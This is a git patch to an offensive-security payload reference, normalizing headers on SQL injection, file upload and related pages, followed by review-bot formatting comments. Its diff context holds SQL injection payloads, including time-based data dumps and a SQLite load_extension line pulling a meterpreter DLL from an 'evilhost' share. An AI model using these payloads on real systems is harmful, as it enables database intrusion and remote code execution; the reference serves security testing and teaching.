From 48a4e5c95b625eff19e5fa349230f3392d4e16f0 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 10 Nov 2024 20:49:52 +0100 Subject: [PATCH] Normalize page header for SQLi, Upload, Cache Deception --- SQL Injection/BigQuery Injection.md | 6 +++- SQL Injection/DB2 Injection.md | 1 + SQL Injection/HQL Injection.md | 2 +- SQL Injection/MSSQL Injection.md | 3 ++ SQL Injection/MySQL Injection.md | 3 ++ SQL Injection/OracleSQL Injection.md | 3 ++ SQL Injection/PostgreSQL Injection.md | 47 ++++++++++++------------ SQL Injection/README.md | 28 ++++++++++----- SQL Injection/SQLite Injection.md | 52 +++++++++++++++------------ SQL Injection/SQLmap.md | 9 ++--- Tabnabbing/README.md | 4 +-- Type Juggling/README.md | 11 ++++-- Upload Insecure Files/README.md | 13 +++++-- Web Cache Deception/README.md | 6 ++-- 14 files changed, 118 insertions(+), 70 deletions(-) diff --git a/SQL Injection/BigQuery Injection.md b/SQL Injection/BigQuery Injection.md index 8fa44d68..e4f8631a 100644 --- a/SQL Injection/BigQuery Injection.md +++ b/SQL Injection/BigQuery Injection.md @@ -1,4 +1,6 @@ -# Google BigQuery SQL Injection +# Google BigQuery SQL Injection + +> Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities. ## Summary @@ -10,6 +12,7 @@ * [BigQuery Time Based](#bigquery-time-based) * [References](#references) + ## Detection * Use a classic single quote to trigger an error: `'` 
@@ -62,6 +65,7 @@ dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY * Time based functions does not exist in the BigQuery syntax. + ## References * [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) diff --git a/SQL Injection/DB2 Injection.md b/SQL Injection/DB2 Injection.md index 47a5fc37..75e94846 100644 --- a/SQL Injection/DB2 Injection.md +++ b/SQL Injection/DB2 Injection.md @@ -2,6 +2,7 @@ > IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments. + ## Summary * [DB2 Cheatsheet](#db2-cheatsheet) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 802957e7..7798b8f7 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -2,6 +2,7 @@ > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia + ## Summary * [HQL Comments](#hql-comments) @@ -15,7 +16,6 @@ * [Methods by DBMS](#methods-by-dbms) * [References](#references) -:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%` ## HQL Comments diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 4f6b853b..a17643ea 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md 
@@ -1,5 +1,8 @@ # MSSQL Injection +> MSSQL Injection is a type of security vulnerability that can occur when an attacker can insert or "inject" malicious SQL code into a query executed by a Microsoft SQL Server (MSSQL) database. This typically happens when user inputs are directly included in SQL queries without proper sanitization or parameterization. SQL Injection can lead to serious consequences such as unauthorized data access, data manipulation, and even gaining control over the database server. + + ## Summary * [MSSQL Default Databases](#mssql-default-databases) diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 83a262c4..bf870400 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -1,5 +1,8 @@ # MySQL Injection +> MySQL Injection is a type of security vulnerability that occurs when an attacker is able to manipulate the SQL queries made to a MySQL database by injecting malicious input. This vulnerability is often the result of improperly handling user input, allowing attackers to execute arbitrary SQL code that can compromise the database's integrity and security. + + ## Summary * [MYSQL Default Databases](#mysql-default-databases) diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md index 4f0ebff5..ecebeb13 100644 --- a/SQL Injection/OracleSQL Injection.md +++ b/SQL Injection/OracleSQL Injection.md @@ -1,5 +1,8 @@ # Oracle SQL Injection +> Oracle SQL Injection is a type of security vulnerability that arises when attackers can insert or "inject" malicious SQL code into SQL queries executed by Oracle Database. This can occur when user inputs are not properly sanitized or parameterized, allowing attackers to manipulate the query logic. This can lead to unauthorized access, data manipulation, and other severe security implications. + + ## Summary * [Oracle SQL Default Databases](#oracle-sql-default-databases) 
diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 466d4da3..9db90e22 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -1,9 +1,12 @@ -# PostgreSQL injection +# PostgreSQL Injection + +> + ## Summary * [PostgreSQL Comments](#postgresql-comments) -* [PostgreSQL version](#postgresql-version) +* [PostgreSQL Version](#postgresql-version) * [PostgreSQL Current User](#postgresql-current-user) * [PostgreSQL List Users](#postgresql-list-users) * [PostgreSQL List Password Hashes](#postgresql-list-password-hashes) @@ -11,22 +14,23 @@ * [PostgreSQL List Privileges](#postgresql-list-privileges) * [PostgreSQL Check if Current User is Superuser](#postgresql-check-if-current-user-is-superuser) * [PostgreSQL database name](#postgresql-database-name) -* [PostgreSQL List databases](#postgresql-list-database) -* [PostgreSQL List tables](#postgresql-list-tables) -* [PostgreSQL List columns](#postgresql-list-columns) +* [PoStgresql List Databases](#postgresql-list-database) +* [PostgreSQL List Tables](#postgresql-list-tables) +* [PostgreSQL List Columns](#postgresql-list-columns) * [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Time Based](#postgresql-time-based) -* [PostgreSQL Stacked query](#postgresql-stacked-query) +* [PostgreSQL Stacked Query](#postgresql-stacked-query) * [PostgreSQL File Read](#postgresql-file-read) * [PostgreSQL File Write](#postgresql-file-write) -* [PostgreSQL Command execution](#postgresql-command-execution) +* [PostgreSQL Command Execution](#postgresql-command-execution) * [CVE-2019–9193](#cve-20199193) * [Using libc.so.6](#using-libcso6) * [Bypass Filter](#bypass-filter) * [References](#references) + ## PostgreSQL Comments ```sql 
@@ -34,15 +38,6 @@ /**/ ``` -## PostgreSQL chain injection points symbols -```sql -; #Used to terminate a SQL command. The only place it can be used within a statement is within a string constant or quoted identifier. -|| #or statement - -# usage examples: -/?whatever=1;(select 1 from pg_sleep(5)) -/?whatever=1||(select 1 from pg_sleep(5)) -``` ## PostgreSQL Version @@ -136,7 +131,7 @@ SELECT column_name FROM information_schema.columns WHERE table_name='data_table' ' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1 ``` -## PostgreSQL XML helpers +## PostgreSQL XML Helpers ```sql select query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row @@ -151,6 +146,7 @@ select database_to_xmlschema(true,true,''); -- dump the current db to an XML sch Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition. + ## PostgreSQL Blind ```sql @@ -160,7 +156,7 @@ Note, with the above queries, the output needs to be assembled in memory. For la ## PostgreSQL Time Based -#### Identify time based +#### Identify Time Based ```sql select 1 from pg_sleep(5) @@ -168,16 +164,20 @@ select 1 from pg_sleep(5) ||(select 1 from pg_sleep(5)) ``` -#### Database dump time based +#### Database Dump Time Based + ```sql select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1 ``` -#### Table dump time based +#### Table Dump Time Based + ```sql select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1 ``` -#### columns dump time based + +#### Columns Dump Time Based + ```sql select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1 select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1 
@@ -191,12 +191,13 @@ AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ## PostgreSQL Stacked Query -Use a semi-colon ";" to add another query +Use a semi-colon "`;`" to add another query ```sql http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));-- ``` + ## PostgreSQL File Read ```sql @@ -238,7 +239,7 @@ SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport ``` -## PostgreSQL Command execution +## PostgreSQL Command Execution ### CVE-2019–9193 diff --git a/SQL Injection/README.md b/SQL Injection/README.md index 422d78ea..172201be 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -1,13 +1,7 @@ # SQL Injection -> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. +> SQL Injection (SQLi) is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. SQL Injection is one of the most common and severe types of web application vulnerabilities, enabling attackers to execute arbitrary SQL code on the database. This can lead to unauthorized data access, data manipulation, and, in some cases, full compromise of the database server. -Attempting to manipulate SQL queries may have goals including: - -- Information Leakage -- Disclosure of stored data -- Manipulation of stored data -- Bypassing authorization controls ## Summary 
@@ -21,7 +15,8 @@ Attempting to manipulate SQL queries may have goals including: * [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md) * [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md) * [SQLmap](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md) -* [Entry point detection](#entry-point-detection) +* [Tools](#tools) +* [Entry Point Detection](#entry-point-detection) * [DBMS Identification](#dbms-identification) * [Authentication bypass](#authentication-bypass) * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) @@ -33,6 +28,8 @@ Attempting to manipulate SQL queries may have goals including: * [No Comma Allowed](#no-comma-allowed) * [No Equal Allowed](#no-equal-allowed) * [Case modification](#case-modification) +* [Labs](#labs) +* [References](#references) ## Tools @@ -41,7 +38,7 @@ Attempting to manipulate SQL queries may have goals including: * [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws -## Entry point detection +## Entry Point Detection Detecting the entry point in SQL injection (SQLi) involves identifying locations in an application where user input is not properly sanitized before it is included in SQL queries. 
@@ -358,6 +355,19 @@ Bypass using LIKE/NOT IN/IN/BETWEEN * [PortSwigger - SQL injection vulnerability allowing login bypass](https://portswigger.net/web-security/sql-injection/lab-login-bypass) * [PortSwigger - SQL injection with filter bypass via XML encoding](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding) * [PortSwigger - SQL Labs](https://portswigger.net/web-security/all-labs#sql-injection) +* [Root Me - SQL injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-authentication) +* [Root Me - SQL injection - Authentication - GBK](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-authentication-GBK) +* [Root Me - SQL injection - String](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-String) +* [Root Me - SQL injection - Numeric](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Numeric) +* [Root Me - SQL injection - Routed](https://www.root-me.org/en/Challenges/Web-Server/SQL-Injection-Routed) +* [Root Me - SQL injection - Error](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Error) +* [Root Me - SQL injection - Insert](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Insert) +* [Root Me - SQL injection - File reading](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-File-reading) +* [Root Me - SQL injection - Time based](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Time-based) +* [Root Me - SQL injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Blind) +* [Root Me - SQL injection - Second Order](https://www.root-me.org/en/Challenges/Web-Server/SQL-Injection-Second-Order) +* [Root Me - SQL injection - Filter bypass](https://www.root-me.org/en/Challenges/Web-Server/SQL-injection-Filter-bypass) +* [Root Me - SQL Truncation](https://www.root-me.org/en/Challenges/Web-Server/SQL-Truncation) ## References 
diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md index a786add7..2524f157 100644 --- a/SQL Injection/SQLite Injection.md +++ b/SQL Injection/SQLite Injection.md 
@@ -1,37 +1,41 @@ # SQLite Injection +> SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues. + + ## Summary -* [SQLite comments](#sqlite-comments) -* [SQLite version](#sqlite-version) -* [String based - Extract database structure](#string-based---extract-database-structure) -* [Integer/String based - Extract table name](#integerstring-based---extract-table-name) -* [Integer/String based - Extract column name](#integerstring-based---extract-column-name) -* [Boolean - Count number of tables](#boolean---count-number-of-tables) -* [Boolean - Enumerating table name](#boolean---enumerating-table-name) -* [Boolean - Extract info](#boolean---extract-info) -* [Boolean - Error based](#boolean---error-based) -* [Time based](#time-based) +* [SQLite Comments](#sqlite-comments) +* [SQLite Version](#sqlite-version) +* [String Based - Extract Database Structure](#string-based---extract-database-structure) +* [Integer/String Based - Extract Table Name](#integerstring-based---extract-table-name) +* [Integer/String Based - Extract Column Name](#integerstring-based---extract-column-name) +* [Boolean - Count Number Of Tables](#boolean---count-number-of-tables) +* [Boolean - Enumerating Table Name](#boolean---enumerating-table-name) +* [Boolean - Extract Info](#boolean---extract-info) +* [Boolean - Error Based](#boolean---error-based) +* [Time Based](#time-based) * [Remote Code Execution](#remote-code-execution) * [Attach Database](#attach-database) * [Load_extension](#load_extension) * [References](#references) -## SQLite comments +## SQLite Comments ```sql -- /**/ ``` -## SQLite version 
+## SQLite Version ```sql select sqlite_version(); ``` -## String based - Extract database structure + +## String Based - Extract Database Structure ```sql SELECT sql FROM sqlite_schema @@ -40,13 +44,16 @@ if sqlite_version > 3.33.0 ```sql SELECT sql FROM sqlite_master ``` -## Integer/String based - Extract table name + + +## Integer/String Based - Extract Table Name ```sql SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ``` -## Integer/String based - Extract column name + +## Integer/String Based - Extract Column Name ```sql SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' @@ -64,37 +71,38 @@ Cleaner output SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name'); ``` -## Boolean - Count number of tables + +## Boolean - Count Number Of Tables ```sql and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table ``` -## Boolean - Enumerating table name +## Boolean - Enumerating Table Name ```sql and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number ``` -## Boolean - Extract info +## Boolean - Extract Info ```sql and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char') ``` -## Boolean - Extract info (order by) +### Boolean - Extract Info (order by) ```sql CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN ELSE END ``` -## Boolean - Error based +## Boolean - Error Based ```sql AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END ``` -## Time based +## Time Based ```sql AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) 
@@ -117,7 +125,7 @@ INSERT INTO lol.pwn (dataz) VALUES ("");-- UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- ``` -Note: By default this component is disabled +Note: By default this component is disabled. ## References diff --git a/SQL Injection/SQLmap.md b/SQL Injection/SQLmap.md index b80b0bf2..5858b441 100644 --- a/SQL Injection/SQLmap.md +++ b/SQL Injection/SQLmap.md 
@@ -1,12 +1,13 @@ # SQLmap -SQLmap is a powerful tool that automates the detection and exploitation of SQL injection vulnerabilities, saving time and effort compared to manual testing. It supports a wide range of databases and injection techniques, making it versatile and effective in various scenarios. +> SQLmap is a powerful tool that automates the detection and exploitation of SQL injection vulnerabilities, saving time and effort compared to manual testing. It supports a wide range of databases and injection techniques, making it versatile and effective in various scenarios. -Additionally, SQLmap can retrieve data, manipulate databases, and even execute commands, providing a robust set of features for penetration testers and security analysts. +> Additionally, SQLmap can retrieve data, manipulate databases, and even execute commands, providing a robust set of features for penetration testers and security analysts. -Reinventing the wheel isn't ideal because SQLmap has been rigorously developed, tested, and improved by experts. Using a reliable, community-supported tool means you benefit from established best practices and avoid the high risk of missing vulnerabilities or introducing errors in custom code. +> Reinventing the wheel isn't ideal because SQLmap has been rigorously developed, tested, and improved by experts. Using a reliable, community-supported tool means you benefit from established best practices and avoid the high risk of missing vulnerabilities or introducing errors in custom code. + +>However you should always know how SQLmap is working, and be able to replicate it manually if necessary. -However you should always know how SQLmap is working, and be able to replicate it manually if necessary. ## Summary diff --git a/Tabnabbing/README.md b/Tabnabbing/README.md index 6cdb95ec..68faf85f 100644 --- a/Tabnabbing/README.md +++ b/Tabnabbing/README.md 
@@ -6,7 +6,7 @@ ## Summary * [Tools](#tools) -* [Description](#description) +* [Methodology](#methodology) * [Exploit](#exploit) * [Discover](#discover) * [References](#references) @@ -17,7 +17,7 @@ - [PortSwigger/discovering-reversetabnabbing](https://portswigger.net/bappstore/80eb8fd46bf847b4b17861482c2f2a30) - Discovering Reverse Tabnabbing -## Description +## Methodology When tabnabbing, the attacker searches for links that are inserted into the website and are under his control. Such links may be contained in a forum post, for example. Once he has found this kind of functionality, it checks that the link's `rel` attribute does not contain the value `noopener` and the target attribute contains the value `_blank`. If this is the case, the website is vulnerable to tabnabbing. diff --git a/Type Juggling/README.md b/Type Juggling/README.md index 61fe3c94..31a9e530 100644 --- a/Type Juggling/README.md +++ b/Type Juggling/README.md @@ -2,6 +2,7 @@ > PHP is a loosely typed language, which means it tries to predict the programmer's intent and automatically converts variables to different types whenever it seems necessary. For example, a string containing only numbers can be treated as an integer or a float. However, this automatic conversion (or type juggling) can lead to unexpected results, especially when comparing variables using the '==' operator, which only checks for value equality (loose comparison), not type and value equality (strict comparison). + ## Summary * [Loose Comparison](#loose-comparison) @@ -9,7 +10,8 @@ * [NULL statements](#null-statements) * [Loose Comparison](#loose-comparison) * [Magic Hashes](#magic-hashes) -* [Exploit](#exploit) +* [Methodology](#methodology) +* [Labs](#labs) * [References](#references) 
@@ -89,7 +91,7 @@ var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m')); ?> ``` -## Exploit +## Methodology The vulnerability in the following code lies in the use of a loose comparison (!=) to validate the $cookie['hmac'] against the calculated `$hash`. @@ -140,6 +142,11 @@ The exploitation phase is the following: 4. In this case we assumed the key was a null string : `$key = '';` +## Labs + +* [Root Me - PHP - type juggling](https://www.root-me.org/en/Challenges/Web-Server/PHP-type-juggling) + + ## References - [(Super) Magic Hashes - myst404 (@myst404_) - October 7, 2019](https://offsec.almond.consulting/super-magic-hash.html) diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index bfeeacd3..40fe4039 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -2,10 +2,11 @@ > Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. + ## Summary * [Tools](#tools) -* [Exploits](#exploits) +* [Methodology](#methodology) * [Defaults extensions](#defaults-extensions) * [Upload tricks](#upload-tricks) * [Filename vulnerabilities](#filename-vulnerabilities) @@ -14,6 +15,7 @@ * [Configuration Files](#configuration-files) * [CVE - ImageMagick](#cve---imagemagick) * [CVE - FFMpeg HLS](#cve---ffmpeg-hls) +* [Labs](#labs) * [References](#references) @@ -24,7 +26,7 @@ - [ZAP/FileUpload](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/) - OWASP ZAP add-on for finding vulnerabilities in File Upload functionality. -## Exploits +## Methodology ![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true) 
@@ -290,7 +292,12 @@ More payloads in the folder `CVE FFmpeg HLS/`. ## Labs -* [Portswigger Labs on File Uploads](https://portswigger.net/web-security/all-labs#file-upload-vulnerabilities) +* [PortSwigger - Labs on File Uploads](https://portswigger.net/web-security/all-labs#file-upload-vulnerabilities) +* [Root Me - File upload - Double extensions](https://www.root-me.org/en/Challenges/Web-Server/File-upload-Double-extensions) +* [Root Me - File upload - MIME type](https://www.root-me.org/en/Challenges/Web-Server/File-upload-MIME-type) +* [Root Me - File upload - Null byte](https://www.root-me.org/en/Challenges/Web-Server/File-upload-Null-byte) +* [Root Me - File upload - ZIP](https://www.root-me.org/en/Challenges/Web-Server/File-upload-ZIP) +* [Root Me - File upload - Polyglot](https://www.root-me.org/en/Challenges/Web-Server/File-upload-Polyglot) ## References diff --git a/Web Cache Deception/README.md b/Web Cache Deception/README.md index 30cefae7..8908523e 100644 --- a/Web Cache Deception/README.md +++ b/Web Cache Deception/README.md @@ -6,7 +6,7 @@ ## Summary * [Tools](#tools) -* [Exploit](#exploit) +* [Methodology](#methodology) * [Caching Sensitive Data](#caching-sensitive-data) * [Caching Custom JavaScript](#caching-custom-javascript) * [CloudFlare Caching](#cloudflare-caching) @@ -19,7 +19,7 @@ * [PortSwigger/param-miner](https://github.com/PortSwigger/param-miner) - Web Cache Poisoning Burp Extension -## Exploit +## Methodology Example of Web Cache Deception: @@ -127,7 +127,7 @@ Exceptions and bypasses: ## Labs -* [PortSwigger Labs for Web cache deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning) +* [PortSwigger Labs for Web Cache Deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning) ## References
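Review bot: in `SQL Injection/PostgreSQL Injection.md` hunk `@@ -1,9 +1,12 @@`, the added `+>` line is an empty blockquote. Every other page in this commit gets a one-paragraph description in that slot, so either write the PostgreSQL one or drop the line rather than shipping an empty quote. In the same hunk, `+* [PoStgresql List Databases](#postgresql-list-database)` has a typo in the product name (should be `PostgreSQL`), and the context line `* [PostgreSQL database name](#postgresql-database-name)` is left lower-case while the entries around it are being title-cased.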
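Review bot: the `@@ -34,15 +38,6 @@` hunk in `SQL Injection/PostgreSQL Injection.md` deletes the whole `## PostgreSQL chain injection points symbols` section (the `;` and `||` explanation with its two usage examples). That is a content removal, not a header normalization, and the subject `Normalize page header for SQLi, Upload, Cache Deception` does not mention it. The `;` usage is still covered by `## PostgreSQL Stacked Query` and the `||` form still appears under `#### Identify Time Based`, so the removal is defensible, but it should be stated in the commit message or split into its own commit. The hunk also leaves two consecutive blank lines before `## PostgreSQL Version`.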
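Review bot: the `@@ -1,13 +1,7 @@` hunk in `SQL Injection/README.md` removes the `Attempting to manipulate SQL queries may have goals including:` list (Information Leakage, Disclosure of stored data, Manipulation of stored data, Bypassing authorization controls) along with the old one-line intro. The new blockquote covers data access and manipulation but not the authorization-bypass goal, which is the topic of two later sections in the same Summary (`Authentication bypass`, `Authentication Bypass (Raw MD5 SHA1)`). Suggest keeping that bullet or folding "bypassing authorization controls" into the new description. Note also that `Tabnabbing/README.md` and `Type Juggling/README.md` are touched by this commit but not named in the subject line.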
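Review bot: in `SQL Injection/HQL Injection.md` hunk `@@ -15,7 +16,6 @@`, the removed line `:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%`` is the only explanation of the `%INJECT_HERE%` placeholder convention. If the payloads further down that page still use the marker, readers lose the key to it; keep the note (moved below the Summary if its placement was the issue) unless the payloads were rewritten as well.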
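Review bot: the spacing before headings ends up inconsistent across the commit. `MSSQL Injection.md`, `MySQL Injection.md`, `OracleSQL Injection.md` and `SQLite Injection.md` get two blank lines between the new blockquote and `## Summary` (the two `+` empty lines), `Type Juggling/README.md` gets two blank lines after the new Labs entry, and `BigQuery Injection.md` gets an extra blank line before `## Detection` and `## References`, while `DB2 Injection.md` and `HQL Injection.md` get one. Since the commit is a normalization pass, pick one convention and apply it everywhere; a single blank line also avoids markdownlint MD012 (no-multiple-blanks) warnings.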
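Review bot: in `SQL Injection/SQLmap.md` hunk `@@ -1,12 +1,13 @@`, `+>However you should always know how SQLmap is working, ...` is missing the space after `>` that the three blockquote lines above it have. It renders the same, but the source reads inconsistently; suggest `> However, you should always know how SQLmap is working, ...` (with the comma after "However" while you are there).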
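Review bot: in `Type Juggling/README.md` hunk `@@ -9,7 +10,8 @@`, the Summary still lists `* [Loose Comparison](#loose-comparison)` twice: once as the first entry (visible in the `@@ -2,6 +2,7 @@` hunk's context) and again right after `* [NULL statements](#null-statements)`. Since this commit is already rewriting that Summary, drop the duplicate here.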
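Review bot: in `SQL Injection/README.md` hunk `@@ -21,7 +15,8 @@`, `Entry point detection` is title-cased to `Entry Point Detection`, but the adjacent context entries `Authentication bypass` and, in the `@@ -33,6 +28,8 @@` hunk, `Case modification` are left as they were. Partial title-casing within one list is more distracting than none; either finish the pass over the Summary or leave the existing entries alone. The anchors are lower-case either way, so the links are unaffected.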
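Review bot: in `SQL Injection/SQLite Injection.md` hunk `@@ -64,37 +71,38 @@`, `## Boolean - Extract info (order by)` becomes `### Boolean - Extract Info (order by)`, which is a heading-level change rather than a case change. That is reasonable if it is meant to sit under `## Boolean - Extract Info`, but it is not mentioned in the commit message, and the `(order by)` part escapes the title-casing applied to the rest of the heading. Also, `Boolean - Count Number Of Tables` capitalizes `Of`, which the other entries (`Extract Table Name`, `Extract Column Name`) do not do for short words.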
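Review bot: in `Web Cache Deception/README.md` hunk `@@ -127,7 +127,7 @@`, only the link text changes to `PortSwigger Labs for Web Cache Deception`; the URL still points at `https://portswigger.net/web-security/all-labs#web-cache-poisoning`, the cache poisoning anchor. Check whether the PortSwigger labs page has a separate anchor for web cache deception and update the URL, or keep the text honest about where the link lands.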
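Review bot: in `SQL Injection/BigQuery Injection.md` hunk `@@ -1,4 +1,6 @@`, the `-# Google BigQuery SQL Injection` / `+# Google BigQuery SQL Injection` pair shows no visible difference, so it is presumably a trailing-whitespace or line-ending fix. Worth a word in the commit message so the next reviewer does not re-read it looking for a typo.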